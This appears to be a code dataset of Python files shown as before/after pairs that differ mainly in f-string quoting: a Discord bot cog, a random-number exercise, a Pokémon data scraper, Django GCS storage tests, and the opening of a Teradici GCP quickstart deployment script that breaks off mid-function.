print(f'Conexão iniciada: {now.strftime("%d/%m/%Y às %H:%M:%S")}')
print('>' + '-'*34 + '<')
@commands.Cog.listener()
async def on_message(self, message):
if message.author == self.bot.user:
return
@commands.Cog.listener()
async def on_command_error(self, ctx, error):
if isinstance(error, MissingRequiredArgument):
await ctx.send("Favor enviar todos os Argumentos. Digite \\help para ver os parâmetros de cada comando")
elif isinstance(error, CommandNotFound):
await ctx.send("O comando não existe. Digite \\help para ver todos os comandos")
else:
raise error
def setup(bot):
bot.add_cog(Manager(bot))
|
import random
import time
import sys
numeros = []
def juntar(lst, string):
lst = str(string).join(str(x) for x in lst)
return lst
def sortear(lista):
print('A gerar valores para a lista: ', end='')
for c1 in range(0, 5):
n = random.randint(0, 100)
lista += [n]
sys.stdout.flush()
time.sleep(1)
if c1 < 4:
print(n, end=', ')
else:
print(n)
def somapar(lista):
s = 0
np = []
for i1 in lista:
if i1 % 2 == 0:
s += i1
np += [i1]
print(f'''Dos valores gerados, {len(np)} eram pares ({juntar(np, ', ')}) e a sua soma é {s}''')
sortear(numeros)
somapar(numeros) | import random
import time
import sys
numeros = []
def juntar(lst, string):
lst = str(string).join(str(x) for x in lst)
return lst
def sortear(lista):
print('A gerar valores para a lista: ', end='')
for c1 in range(0, 5):
n = random.randint(0, 100)
lista += [n]
sys.stdout.flush()
time.sleep(1)
if c1 < 4:
print(n, end=', ')
else:
print(n)
def somapar(lista):
s = 0
np = []
for i1 in lista:
if i1 % 2 == 0:
s += i1
np += [i1]
print(f'''Dos valores gerados, {len(np)} eram pares ({juntar(np, ', ')}) e a sua soma é {s}''')
sortear(numeros)
somapar(numeros) |
import asyncio
# driver = webdriver.Chrome(executable_path=r"chromedriver.exe")
import json
from io import BytesIO
# import aiohttp
# import bs4
# import html5lib
# from bs4 import BeautifulSoup
# from selenium import webdriver
URL = "https://pokemondb.net/pokedex/all"
CDNURL = "https://assets.pokemon.com/assets/cms2/img/pokedex/detail/{}.png"
POKEDEX = "https://img.pokemondb.net/artwork/{}"
EVOLVE = "https://pokemondb.net/evolution/level"
SHINY = "https://pokemondb.net/pokedex/shiny"
# DOESNT DO MEGAS ETC.
async def main():
# # a = {"mega": [], "normal": [], "all": {}}
# driver.get(SHINY)
# await asyncio.sleep(10)
# soup = bs4.BeautifulSoup(driver.page_source, "html.parser")
# da = soup.find_all("div", {"class": "infocard-list infocard-list-pkmn-lg"})
# a = []
# for div in da:
# tags = div.find_all("div", {"class": "infocard"})
# for poke in tags:
# if len(poke.find_all("small")) == 2:
# num = int(poke.find("small").get_text().replace("#", ""))
# print(num)
# img = poke.find_all("img")
# if not img:
# print(img)
# img = img[1].attrs["src"]
# a.append([num, img])
# await write(a, "shiny")
# with open(f"pokecord/data/shiny.json", "r", encoding="utf-8") as f:
# a = json.load(f)
print(2)
with open(f"pokecord/data/pokedex.json", "r", encoding="utf-8") as f:
p = json.load(f)
with open(f"pokecord/data/legendary.json", "r", encoding="utf-8") as f:
l = json.load(f)
with open(f"pokecord/data/mythical.json", "r", encoding="utf-8") as f:
m = json.load(f)
data = p + l + m
a = []
MEGAS = [
3,
6,
9,
64,
94,
115,
127,
130,
142,
150,
181,
212,
214,
229,
248,
257,
282,
303,
306,
308,
310,
354,
359,
380,
381,
445,
448,
460,
15,
18,
80,
208,
254,
302,
319,
323,
334,
362,
373,
376,
384,
428,
475,
531,
719,
]
for pokemon in data:
if pokemon["id"] in MEGAS:
pokemon["variant"] = "Mega"
for stat in pokemon["stats"]:
pokemon["stats"][stat] += 50
pokemon["spawnchance"] = 0.001
pokemon["alias"] = f"Mega {pokemon["name"]["english"]}"
a.append(pokemon)
await write(a, "megas")
async def get_img():
session = aiohttp.ClientSession()
with open(f"pokecord/data/pokedex.json", "r", encoding="utf-8") as f:
data = json.load(f)
for pokemon in data:
img = await session.get(
f"https://assets.pokemon.com/assets/cms2/img/pokedex/detail/{str(pokemon["id"]).zfill(3)}.png"
)
name = f"pokecord/data/pokemon/{pokemon["name"]["english"]}.png"
with open(name, "wb") as f:
f.write(BytesIO(await img.read()).getbuffer())
with open(f"pokecord/data/shiny.json", "r", encoding="utf-8") as f:
data = json.load(f)
for pokemon in data:
img = await session.get(pokemon["url"])
name = f"pokecord/data/pokemon/{pokemon["alias"]}.png"
with open(name, "wb") as f:
f.write(BytesIO(await img.read()).getbuffer())
await session.close()
async def evolve():
a = {}
driver.get(EVOLVE)
parse = BeautifulSoup(driver.page_source, "html5lib")
await asyncio.sleep(3)
soup = bs4.BeautifulSoup(driver.page_source, "html.parser")
table = soup.find("table", {"id": "evolution"})
evolves = table.find_all("tr")
for tag in evolves[1:]:
pokes = tag.find_all("span", {"class": "infocard-cell-data"})
lvl = tag.find("td", {"class": "cell-num"})
if lvl is None:
break
names = []
for pokemon in pokes:
small = pokemon.find("small", {"class": "text-muted"})
if small is None:
small = pokemon.find("a")
names.append(small.get_text())
a[names[0]] = {"evolution": names[1], "level": lvl.get_text()}
await write(a, "evolve")
async def write(lst, name):
with open(f"pokecord/data/{name}.json", "w") as f:
f.write(json.dumps(lst, indent=1))
def spawn_rate():
with open(f"pokecord/data/pokedex.json", "r", encoding="utf-8") as f:
data = json.load(f)
stats = []
for pokemon in data:
total = 0
for stat in pokemon["stats"]:
total += pokemon["stats"][stat]
stats.append(800 - total)
pokemon["spawnchance"] = (800 - total) / 800
with open(f"pokecord/data/pokedex.json", "w") as f:
f.write(json.dumps(data))
loop = asyncio.get_event_loop()
loop.run_until_complete(main())
| import asyncio
# driver = webdriver.Chrome(executable_path=r"chromedriver.exe")
import json
from io import BytesIO
# import aiohttp
# import bs4
# import html5lib
# from bs4 import BeautifulSoup
# from selenium import webdriver
URL = "https://pokemondb.net/pokedex/all"
CDNURL = "https://assets.pokemon.com/assets/cms2/img/pokedex/detail/{}.png"
POKEDEX = "https://img.pokemondb.net/artwork/{}"
EVOLVE = "https://pokemondb.net/evolution/level"
SHINY = "https://pokemondb.net/pokedex/shiny"
# DOESNT DO MEGAS ETC.
async def main():
# # a = {"mega": [], "normal": [], "all": {}}
# driver.get(SHINY)
# await asyncio.sleep(10)
# soup = bs4.BeautifulSoup(driver.page_source, "html.parser")
# da = soup.find_all("div", {"class": "infocard-list infocard-list-pkmn-lg"})
# a = []
# for div in da:
# tags = div.find_all("div", {"class": "infocard"})
# for poke in tags:
# if len(poke.find_all("small")) == 2:
# num = int(poke.find("small").get_text().replace("#", ""))
# print(num)
# img = poke.find_all("img")
# if not img:
# print(img)
# img = img[1].attrs["src"]
# a.append([num, img])
# await write(a, "shiny")
# with open(f"pokecord/data/shiny.json", "r", encoding="utf-8") as f:
# a = json.load(f)
print(2)
with open(f"pokecord/data/pokedex.json", "r", encoding="utf-8") as f:
p = json.load(f)
with open(f"pokecord/data/legendary.json", "r", encoding="utf-8") as f:
l = json.load(f)
with open(f"pokecord/data/mythical.json", "r", encoding="utf-8") as f:
m = json.load(f)
data = p + l + m
a = []
MEGAS = [
3,
6,
9,
64,
94,
115,
127,
130,
142,
150,
181,
212,
214,
229,
248,
257,
282,
303,
306,
308,
310,
354,
359,
380,
381,
445,
448,
460,
15,
18,
80,
208,
254,
302,
319,
323,
334,
362,
373,
376,
384,
428,
475,
531,
719,
]
for pokemon in data:
if pokemon["id"] in MEGAS:
pokemon["variant"] = "Mega"
for stat in pokemon["stats"]:
pokemon["stats"][stat] += 50
pokemon["spawnchance"] = 0.001
pokemon["alias"] = f"Mega {pokemon['name']['english']}"
a.append(pokemon)
await write(a, "megas")
async def get_img():
session = aiohttp.ClientSession()
with open(f"pokecord/data/pokedex.json", "r", encoding="utf-8") as f:
data = json.load(f)
for pokemon in data:
img = await session.get(
f"https://assets.pokemon.com/assets/cms2/img/pokedex/detail/{str(pokemon['id']).zfill(3)}.png"
)
name = f"pokecord/data/pokemon/{pokemon['name']['english']}.png"
with open(name, "wb") as f:
f.write(BytesIO(await img.read()).getbuffer())
with open(f"pokecord/data/shiny.json", "r", encoding="utf-8") as f:
data = json.load(f)
for pokemon in data:
img = await session.get(pokemon["url"])
name = f"pokecord/data/pokemon/{pokemon['alias']}.png"
with open(name, "wb") as f:
f.write(BytesIO(await img.read()).getbuffer())
await session.close()
async def evolve():
a = {}
driver.get(EVOLVE)
parse = BeautifulSoup(driver.page_source, "html5lib")
await asyncio.sleep(3)
soup = bs4.BeautifulSoup(driver.page_source, "html.parser")
table = soup.find("table", {"id": "evolution"})
evolves = table.find_all("tr")
for tag in evolves[1:]:
pokes = tag.find_all("span", {"class": "infocard-cell-data"})
lvl = tag.find("td", {"class": "cell-num"})
if lvl is None:
break
names = []
for pokemon in pokes:
small = pokemon.find("small", {"class": "text-muted"})
if small is None:
small = pokemon.find("a")
names.append(small.get_text())
a[names[0]] = {"evolution": names[1], "level": lvl.get_text()}
await write(a, "evolve")
async def write(lst, name):
with open(f"pokecord/data/{name}.json", "w") as f:
f.write(json.dumps(lst, indent=1))
def spawn_rate():
with open(f"pokecord/data/pokedex.json", "r", encoding="utf-8") as f:
data = json.load(f)
stats = []
for pokemon in data:
total = 0
for stat in pokemon["stats"]:
total += pokemon["stats"][stat]
stats.append(800 - total)
pokemon["spawnchance"] = (800 - total) / 800
with open(f"pokecord/data/pokedex.json", "w") as f:
f.write(json.dumps(data))
loop = asyncio.get_event_loop()
loop.run_until_complete(main())
|
from unittest import skipIf
from decouple import config
from django.test import TestCase, override_settings
from google.api_core.client_options import ClientOptions
from google.auth.credentials import AnonymousCredentials
from google.cloud.exceptions import NotFound
from google.cloud.storage import Blob, Bucket, Client
from physionet.gcs import GCSObject, GCSObjectException
from physionet.settings.base import StorageTypes
TEST_GCS_INTEGRATION = config('TEST_GCS_INTEGRATION', default=True, cast=bool)
GCS_HOST = config('GCS_HOST', default=None)
@skipIf(
(GCS_HOST is None or not TEST_GCS_INTEGRATION),
'Test GCS-backend integration only on dockerized CI/CD pipeline.',
)
@override_settings(
STORAGE_TYPE=StorageTypes.GCP,
DEFAULT_FILE_STORAGE='physionet.storage.MediaStorage',
STATICFILES_STORAGE='physionet.storage.StaticStorage',
GCP_STORAGE_BUCKET_NAME='physionet-media',
GCP_STATIC_BUCKET_NAME='physionet-static',
GS_PROJECT_ID='test_project_id',
GCP_BUCKET_LOCATION='us-west1',
)
class TestGCSObject(TestCase):
@classmethod
def setUpTestData(cls):
cls.gcs_server_endpoint = f'http://{config('GCS_HOST', default='gcs')}:4443'
cls.bucket_name = 'test'
cls.path = 'physionet/users/admin/profile.jpg'
def tearDown(self):
try:
self._clear_gcs_bucket(self.bucket_name)
except NotFound:
pass
def _clear_gcs_bucket(self, name):
self._get_gcs_client().get_bucket(name).delete(force=True)
def _get_gcs_client(self):
return Client(
project="test_project_id",
credentials=AnonymousCredentials(),
client_options=ClientOptions(api_endpoint=self.gcs_server_endpoint),
)
def _monkeypatch_gcsobject(self, gcs_object):
gcs_object._storage._client = self._get_gcs_client()
return gcs_object
@override_settings(STORAGE_TYPE=StorageTypes.LOCAL)
def test_init_raises_exception_when_storage_types_is_local(self):
self.assertRaises(GCSObjectException, GCSObject, self.path)
@override_settings(STORAGE_TYPE=StorageTypes.GCP)
def test_init_when_storage_type_is_gcp(self):
gcs_object = self._monkeypatch_gcsobject(GCSObject(self.path))
self.assertEqual(gcs_object.bucket.name, 'physionet')
self.assertEqual(gcs_object._object_name, 'users/admin/profile.jpg')
def test_repr(self):
gcs_object = self._monkeypatch_gcsobject(GCSObject(self.path))
self.assertEqual(
repr(gcs_object),
'GCSObject(Bucket=physionet, Object="users/admin/profile.jpg")',
)
def test_bucket_property_return_bucket_proper_object(self):
gcs_object = self._monkeypatch_gcsobject(GCSObject(self.path))
self.assertIsInstance(gcs_object.bucket, Bucket)
self.assertEqual(gcs_object.bucket.name, 'physionet')
def test_blob_property_return_proper_object(self):
gcs_object = self._monkeypatch_gcsobject(GCSObject(self.path))
self.assertIsInstance(gcs_object.blob, Blob)
self.assertEqual(gcs_object.blob.name, 'users/admin/profile.jpg')
def test_mkdir_makes_directories(self):
# GIVEN
gcs_object = self._monkeypatch_gcsobject(GCSObject('test/dir1/dir2/'))
gcs_object.client.create_bucket('test')
# WHEN
gcs_object.mkdir()
# THEN
self.assertTrue(gcs_object.bucket.get_blob('dir1/dir2/'))
def test_mkdir_doesnt_work_when_object_name_is_taken(self):
# GIVEN
gcs_object = self._monkeypatch_gcsobject(GCSObject('test/dir1/dir2/'))
gcs_object.client.create_bucket('test')
gcs_object.mkdir()
# WHEN + THEN
self.assertRaises(GCSObjectException, gcs_object.mkdir)
def test_size_when_object_is_file(self):
# GIVEN
gcs_object = self._monkeypatch_gcsobject(GCSObject('test/dir1/notes.txt'))
gcs_object.client.create_bucket('test')
gcs_object.upload_from_string('content')
# WHEN + THEN
self.assertEqual(gcs_object.size(), len('content'))
def test_size_when_object_is_directory(self):
# GIVEN
gcs_object = self._monkeypatch_gcsobject(GCSObject('test/dir1/'))
gcs_object_1 = self._monkeypatch_gcsobject(GCSObject('test/dir1/notes1.txt'))
gcs_object_2 = self._monkeypatch_gcsobject(GCSObject('test/dir1/notes2.txt'))
# create a bucket
gcs_object.client.create_bucket('test')
# put files into a bucket
gcs_object_1.upload_from_string('content')
gcs_object_2.upload_from_string('content')
# WHEN + THEN
self.assertEqual(gcs_object.size(), len('content') * 2)
def test_rm_deletes_all_files_in_directory_when_object_is_directory(self):
# GIVEN
gcs_object = self._monkeypatch_gcsobject(GCSObject('test/dir1/'))
gcs_object_1 = self._monkeypatch_gcsobject(GCSObject('test/dir1/notes1.txt'))
gcs_object_2 = self._monkeypatch_gcsobject(GCSObject('test/dir1/notes2.txt'))
# create a bucket
gcs_object.client.create_bucket('test')
# put files into a bucket
gcs_object_1.upload_from_string('content')
gcs_object_2.upload_from_string('content')
# WHEN
gcs_object.rm()
# THEN
self.assertEqual(gcs_object.size(), 0)
def test_rm_removes_file_when_object_is_file(self):
# GIVEN
gcs_object = self._monkeypatch_gcsobject(GCSObject('test/dir/file.jpg'))
gcs_object.client.create_bucket('test')
gcs_object.upload_from_string('content')
# WHEN
gcs_object.rm()
# THEN
dir_ = self._monkeypatch_gcsobject(self._monkeypatch_gcsobject(GCSObject('test/dir/')))
self.assertEqual(dir_.size(), 0)
def test_cp_copies_file_to_directory(self):
# GIVEN
gcs_object = self._monkeypatch_gcsobject(GCSObject('test/dir/file.jpg'))
gcs_object_1 = self._monkeypatch_gcsobject(GCSObject('test/dir/'))
# create a bucket
gcs_object.client.create_bucket('test')
# put a file into a bucket
gcs_object.upload_from_string('content')
# WHEN
gcs_object_1.cp(self._monkeypatch_gcsobject(GCSObject('test/dir_copied/')))
# THEN
self.assertEqual(gcs_object_1.size(), len('content'))
self.assertEqual(gcs_object.size(), len('content'))
def test_mv_moves_file_when_object_is_file(self):
# GIVEN
gcs_object = self._monkeypatch_gcsobject(GCSObject('test/dir/file.jpg'))
gcs_object_1 = self._monkeypatch_gcsobject(GCSObject('test/dir/'))
gcs_object_2 = self._monkeypatch_gcsobject(GCSObject('test/dir_copied/'))
# create a bucket
gcs_object.client.create_bucket('test')
# put a file into a bucket
gcs_object.upload_from_string('content')
# WHEN
gcs_object_1.mv(self._monkeypatch_gcsobject(GCSObject('test/dir_copied/')))
# THEN
self.assertEqual(gcs_object_2.size(), len('content'))
self.assertEqual(gcs_object.exists(), False)
def test_rename_file(self):
# GIVEN
gcs_object = self._monkeypatch_gcsobject(GCSObject('test/file.jpg'))
gcs_object.client.create_bucket('test')
gcs_object.upload_from_string('content')
gcs_object_renamed = self._monkeypatch_gcsobject(GCSObject('test/renamed.jpg'))
# WHEN
gcs_object.rename(gcs_object_renamed)
# THEN
self.assertFalse(gcs_object.exists())
self.assertTrue(gcs_object_renamed.exists())
self.assertEqual(gcs_object_renamed.size(), len('content'))
| from unittest import skipIf
from decouple import config
from django.test import TestCase, override_settings
from google.api_core.client_options import ClientOptions
from google.auth.credentials import AnonymousCredentials
from google.cloud.exceptions import NotFound
from google.cloud.storage import Blob, Bucket, Client
from physionet.gcs import GCSObject, GCSObjectException
from physionet.settings.base import StorageTypes
TEST_GCS_INTEGRATION = config('TEST_GCS_INTEGRATION', default=True, cast=bool)
GCS_HOST = config('GCS_HOST', default=None)
@skipIf(
(GCS_HOST is None or not TEST_GCS_INTEGRATION),
'Test GCS-backend integration only on dockerized CI/CD pipeline.',
)
@override_settings(
STORAGE_TYPE=StorageTypes.GCP,
DEFAULT_FILE_STORAGE='physionet.storage.MediaStorage',
STATICFILES_STORAGE='physionet.storage.StaticStorage',
GCP_STORAGE_BUCKET_NAME='physionet-media',
GCP_STATIC_BUCKET_NAME='physionet-static',
GS_PROJECT_ID='test_project_id',
GCP_BUCKET_LOCATION='us-west1',
)
class TestGCSObject(TestCase):
@classmethod
def setUpTestData(cls):
cls.gcs_server_endpoint = f'http://{config("GCS_HOST", default="gcs")}:4443'
cls.bucket_name = 'test'
cls.path = 'physionet/users/admin/profile.jpg'
def tearDown(self):
try:
self._clear_gcs_bucket(self.bucket_name)
except NotFound:
pass
def _clear_gcs_bucket(self, name):
self._get_gcs_client().get_bucket(name).delete(force=True)
def _get_gcs_client(self):
return Client(
project="test_project_id",
credentials=AnonymousCredentials(),
client_options=ClientOptions(api_endpoint=self.gcs_server_endpoint),
)
def _monkeypatch_gcsobject(self, gcs_object):
gcs_object._storage._client = self._get_gcs_client()
return gcs_object
@override_settings(STORAGE_TYPE=StorageTypes.LOCAL)
def test_init_raises_exception_when_storage_types_is_local(self):
self.assertRaises(GCSObjectException, GCSObject, self.path)
@override_settings(STORAGE_TYPE=StorageTypes.GCP)
def test_init_when_storage_type_is_gcp(self):
gcs_object = self._monkeypatch_gcsobject(GCSObject(self.path))
self.assertEqual(gcs_object.bucket.name, 'physionet')
self.assertEqual(gcs_object._object_name, 'users/admin/profile.jpg')
def test_repr(self):
gcs_object = self._monkeypatch_gcsobject(GCSObject(self.path))
self.assertEqual(
repr(gcs_object),
'GCSObject(Bucket=physionet, Object="users/admin/profile.jpg")',
)
def test_bucket_property_return_bucket_proper_object(self):
gcs_object = self._monkeypatch_gcsobject(GCSObject(self.path))
self.assertIsInstance(gcs_object.bucket, Bucket)
self.assertEqual(gcs_object.bucket.name, 'physionet')
def test_blob_property_return_proper_object(self):
gcs_object = self._monkeypatch_gcsobject(GCSObject(self.path))
self.assertIsInstance(gcs_object.blob, Blob)
self.assertEqual(gcs_object.blob.name, 'users/admin/profile.jpg')
def test_mkdir_makes_directories(self):
# GIVEN
gcs_object = self._monkeypatch_gcsobject(GCSObject('test/dir1/dir2/'))
gcs_object.client.create_bucket('test')
# WHEN
gcs_object.mkdir()
# THEN
self.assertTrue(gcs_object.bucket.get_blob('dir1/dir2/'))
def test_mkdir_doesnt_work_when_object_name_is_taken(self):
# GIVEN
gcs_object = self._monkeypatch_gcsobject(GCSObject('test/dir1/dir2/'))
gcs_object.client.create_bucket('test')
gcs_object.mkdir()
# WHEN + THEN
self.assertRaises(GCSObjectException, gcs_object.mkdir)
def test_size_when_object_is_file(self):
# GIVEN
gcs_object = self._monkeypatch_gcsobject(GCSObject('test/dir1/notes.txt'))
gcs_object.client.create_bucket('test')
gcs_object.upload_from_string('content')
# WHEN + THEN
self.assertEqual(gcs_object.size(), len('content'))
def test_size_when_object_is_directory(self):
# GIVEN
gcs_object = self._monkeypatch_gcsobject(GCSObject('test/dir1/'))
gcs_object_1 = self._monkeypatch_gcsobject(GCSObject('test/dir1/notes1.txt'))
gcs_object_2 = self._monkeypatch_gcsobject(GCSObject('test/dir1/notes2.txt'))
# create a bucket
gcs_object.client.create_bucket('test')
# put files into a bucket
gcs_object_1.upload_from_string('content')
gcs_object_2.upload_from_string('content')
# WHEN + THEN
self.assertEqual(gcs_object.size(), len('content') * 2)
def test_rm_deletes_all_files_in_directory_when_object_is_directory(self):
# GIVEN
gcs_object = self._monkeypatch_gcsobject(GCSObject('test/dir1/'))
gcs_object_1 = self._monkeypatch_gcsobject(GCSObject('test/dir1/notes1.txt'))
gcs_object_2 = self._monkeypatch_gcsobject(GCSObject('test/dir1/notes2.txt'))
# create a bucket
gcs_object.client.create_bucket('test')
# put files into a bucket
gcs_object_1.upload_from_string('content')
gcs_object_2.upload_from_string('content')
# WHEN
gcs_object.rm()
# THEN
self.assertEqual(gcs_object.size(), 0)
def test_rm_removes_file_when_object_is_file(self):
# GIVEN
gcs_object = self._monkeypatch_gcsobject(GCSObject('test/dir/file.jpg'))
gcs_object.client.create_bucket('test')
gcs_object.upload_from_string('content')
# WHEN
gcs_object.rm()
# THEN
dir_ = self._monkeypatch_gcsobject(self._monkeypatch_gcsobject(GCSObject('test/dir/')))
self.assertEqual(dir_.size(), 0)
def test_cp_copies_file_to_directory(self):
# GIVEN
gcs_object = self._monkeypatch_gcsobject(GCSObject('test/dir/file.jpg'))
gcs_object_1 = self._monkeypatch_gcsobject(GCSObject('test/dir/'))
# create a bucket
gcs_object.client.create_bucket('test')
# put a file into a bucket
gcs_object.upload_from_string('content')
# WHEN
gcs_object_1.cp(self._monkeypatch_gcsobject(GCSObject('test/dir_copied/')))
# THEN
self.assertEqual(gcs_object_1.size(), len('content'))
self.assertEqual(gcs_object.size(), len('content'))
def test_mv_moves_file_when_object_is_file(self):
# GIVEN
gcs_object = self._monkeypatch_gcsobject(GCSObject('test/dir/file.jpg'))
gcs_object_1 = self._monkeypatch_gcsobject(GCSObject('test/dir/'))
gcs_object_2 = self._monkeypatch_gcsobject(GCSObject('test/dir_copied/'))
# create a bucket
gcs_object.client.create_bucket('test')
# put a file into a bucket
gcs_object.upload_from_string('content')
# WHEN
gcs_object_1.mv(self._monkeypatch_gcsobject(GCSObject('test/dir_copied/')))
# THEN
self.assertEqual(gcs_object_2.size(), len('content'))
self.assertEqual(gcs_object.exists(), False)
def test_rename_file(self):
# GIVEN
gcs_object = self._monkeypatch_gcsobject(GCSObject('test/file.jpg'))
gcs_object.client.create_bucket('test')
gcs_object.upload_from_string('content')
gcs_object_renamed = self._monkeypatch_gcsobject(GCSObject('test/renamed.jpg'))
# WHEN
gcs_object.rename(gcs_object_renamed)
# THEN
self.assertFalse(gcs_object.exists())
self.assertTrue(gcs_object_renamed.exists())
self.assertEqual(gcs_object_renamed.size(), len('content'))
|
#!/usr/bin/env python3
# Copyright (c) 2019 Teradici Corporation
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import argparse
import base64
import datetime
import importlib
import json
import os
import re
import shutil
import site
import subprocess
import sys
import textwrap
import time
import casmgr
import interactive
REQUIRED_PACKAGES = {
'google-api-python-client': None,
'grpc-google-iam-v1': None,
'google-cloud-kms': "2.0.0"
}
# Service Account ID of the service account to create
SA_ID = 'cas-manager'
SA_ROLES = [
'roles/editor',
'roles/cloudkms.cryptoKeyEncrypterDecrypter'
]
PROJECT_ID = os.environ['GOOGLE_CLOUD_PROJECT']
REQUIRED_APIS = [
'deploymentmanager.googleapis.com',
'cloudkms.googleapis.com',
'cloudresourcemanager.googleapis.com',
'compute.googleapis.com',
'dns.googleapis.com',
'iam.googleapis.com',
]
iso_time = datetime.datetime.utcnow().isoformat(timespec='seconds').replace(':','').replace('-','') + 'Z'
DEPLOYMENT_NAME = 'quickstart_deployment_' + iso_time
CONNECTOR_NAME = 'quickstart_cac_' + iso_time
# User entitled to workstations
ENTITLE_USER = 'Administrator'
HOME = os.path.expanduser('~')
TERRAFORM_BIN_DIR = f'{HOME}/bin'
TERRAFORM_BIN_PATH = TERRAFORM_BIN_DIR + '/terraform'
TERRAFORM_VER_PATH = '../deployments/gcp/single-connector/versions.tf'
CFG_FILE_PATH = 'gcp-cloudshell-quickstart.cfg'
DEPLOYMENT_PATH = 'deployments/gcp/single-connector'
# All of the following paths are relative to the deployment directory, DEPLOYMENT_PATH
TF_VARS_REF_PATH = 'terraform.tfvars.sample'
TF_VARS_PATH = 'terraform.tfvars'
SECRETS_DIR = 'secrets'
GCP_SA_KEY_PATH = SECRETS_DIR + '/gcp_service_account_key.json'
SSH_KEY_PATH = SECRETS_DIR + '/cas_mgr_admin_id_rsa'
CAS_MGR_DEPLOYMENT_SA_KEY_PATH = SECRETS_DIR + '/cas_mgr_deployment_sa_key.json.encrypted'
# Types of workstations
WS_TYPES = ['scent', 'gcent', 'swin', 'gwin']
def ensure_requirements():
if not PROJECT_ID:
print('The PROJECT property has not been set.')
print('Please run "gcloud config set project [PROJECT_ID]" to set the project.')
print('See: https://cloud.google.com/sdk/gcloud/reference/config/set')
print('')
sys.exit(1)
ensure_required_packages()
import_modules()
ensure_terraform()
def ensure_required_packages():
"""A function that ensures the correct version of Python packages are installed.
The function first checks if the required packages are installed. If a package is
installed, the required version number will then be checked. It will next prompt
the user to update or install the required packages.
"""
packages_to_install_list = []
for package, required_version in REQUIRED_PACKAGES.items():
check_cmd = f'{sys.executable} -m pip show {package}'
output = subprocess.run(check_cmd.split(' '), stdout=subprocess.PIPE).stdout.decode('utf-8')
# If a package is not found, skip version checking and simply install the latest package
if not output:
packages_to_install_list.append(package)
elif required_version is not None:
# Second line outputs the version of the specified package
current_version = output.splitlines()[1].split(' ')[-1]
# Convert the string into a tuple of numbers for comparison
current_version_tuple = tuple( map(int, current_version.split('.')) )
required_version_tuple = tuple( map(int, required_version.split('.')) )
if current_version_tuple < required_version_tuple:
packages_to_install_list.append(package)
if packages_to_install_list:
# Convert the list to a string of packages delimited by a space
packages_to_install = " ".join(packages_to_install_list)
install_cmd = f'{sys.executable} -m pip install --upgrade {packages_to_install} --user'
install_permission = input(
'One or more of the following Python packages are outdated or missing:\n'
f' {packages_to_install}\n\n'
'The script can install these packages in the user\'s home directory using the following command:\n'
f' {install_cmd}\n'
'Proceed? (y/n)? ').strip().lower()
if install_permission not in ('y', 'yes'):
print('Python packages are required for deployment. Exiting...')
sys.exit(1)
subprocess.check_call(install_cmd.split(' '))
# Refresh sys.path to detect new modules in user's home directory.
importlib.reload(site)
def import_modules():
"""A function that dynamically imports required Python packages.
"""
# Global calls for import statements are required to avoid module not found error
import_required_packages = '''\
import googleapiclient.discovery
from google.cloud import kms
from google.api_core import exceptions as google_exc
'''
# Recommended to clear cache after installing python packages for dynamic imports
importlib.invalidate_caches()
exec(textwrap.dedent(import_required_packages), globals())
print('Successfully imported required Python packages.')
def ensure_terraform():
"""A function that ensures the required Terraform version is installed.
The function first checks if the required Terraform version is installed in
the user's system. If Terraform is not installed, it will prompt the user to
install Terraform in the user's home directory.
"""
global TERRAFORM_BIN_PATH
path = shutil.which('terraform')
# Reference versions.tf file for the required version
with open(TERRAFORM_VER_PATH,"r") as f:
data = f.read()
required_version = re.search(r'\">=\s([\d.]+)\"', data).group(1)
if path:
cmd = 'terraform -v'
# Run the command 'terraform -v' and use the first line as the Terraform version
terraform_version = subprocess.run(cmd.split(' '), stdout=subprocess.PIPE).stdout.decode('utf-8').splitlines()[0]
print(f'Found {terraform_version} in {path}.')
# Use regex to parse the version number from string (i.e. 0.12.18)
current_version = re.search(r'Terraform\s*v([\d.]+)', terraform_version).group(1)
# Convert the string into a tuple of numbers for comparison
current_version_tuple = tuple( map(int, current_version.split('.')) )
required_version_tuple = tuple( map(int, required_version.split('.')) )
if current_version_tuple >= required_version_tuple:
TERRAFORM_BIN_PATH = path
return
install_permission = input(
f'This system is missing Terraform version >= {required_version}.\n'
f'Proceed to download and install Terraform in {TERRAFORM_BIN_DIR} (y/n)? ').strip().lower()
if install_permission not in ('y', 'yes'):
print('Terraform is required for deployment. Exiting...')
sys.exit(1)
install_cmd = f'{sys.executable} install-terraform.py {TERRAFORM_BIN_DIR}'
subprocess.run(install_cmd.split(' '), check=True)
def quickstart_config_read(cfg_file):
cfg_data = {}
with open(cfg_file, 'r') as f:
for line in f:
if line[0] in ('#', '\n'):
continue
key, value = map(str.strip, line.split(':'))
cfg_data[key] = value
return cfg_data
def service_account_find(email):
service_accounts = iam_service.projects().serviceAccounts().list(
name = f'projects/{PROJECT_ID}',
).execute()
if not service_accounts:
return
for account in service_accounts['accounts']:
if account['email'] == email:
return account
def service_account_create(email):
print('Creating Service Account...')
service_account = service_account_find(email)
if service_account:
print(f' Service account {email} already exists.')
# The service account limit check is placed here so that the script doesn't
# unfortunately exit after the user enters their configurations if error, but
# the key will be created later to avoid reaching the limit, in case
# something goes wrong and the script exits before the key is used.
service_account_create_key_limit_check(service_account)
return service_account
service_account = iam_service.projects().serviceAccounts().create(
name = 'projects/' + PROJECT_ID,
body = {
'accountId': SA_ID,
'serviceAccount': {
'displayName': SA_ID,
'description': 'Account used by CAS Manager to manage PCoIP workstations.',
}
}
).execute()
print(' Created service account: ' + service_account['email'])
return service_account
def service_account_create_key(service_account, filepath):
print(f'Created key for {service_account['email']}...')
key = iam_service.projects().serviceAccounts().keys().create(
name = 'projects/-/serviceAccounts/' + service_account['email'],
body = {},
).execute()
key_data = base64.b64decode(key['privateKeyData'])
with open(filepath, 'wb') as keyfile:
keyfile.write(key_data)
print(' Key written to ' + filepath)
return json.loads(key_data.decode('utf-8'))
def service_account_create_key_limit_check(service_account):
print(f' Checking number of keys owned by {service_account['email']}... ', end='')
keys = iam_service.projects().serviceAccounts().keys().list(
name='projects/-/serviceAccounts/' + service_account['email']
).execute()['keys']
user_managed_keys = list(filter(lambda k: (k['keyType'] == 'USER_MANAGED'), keys))
print(f'{len(user_managed_keys)}/10')
if len(user_managed_keys) >= 10:
print(f' ERROR: The service account has reached the limit of the number of keys it can create.',
' Please see: https://cloud.google.com/iam/docs/creating-managing-service-account-keys',
'Exiting script...', sep='\n')
sys.exit(1)
def iam_policy_update(service_account, roles):
policy = crm_service.projects().getIamPolicy(
resource = PROJECT_ID,
body = {},
).execute()
print('Adding roles:')
for role in roles:
print(f' {role}...')
binding = {
'role': role,
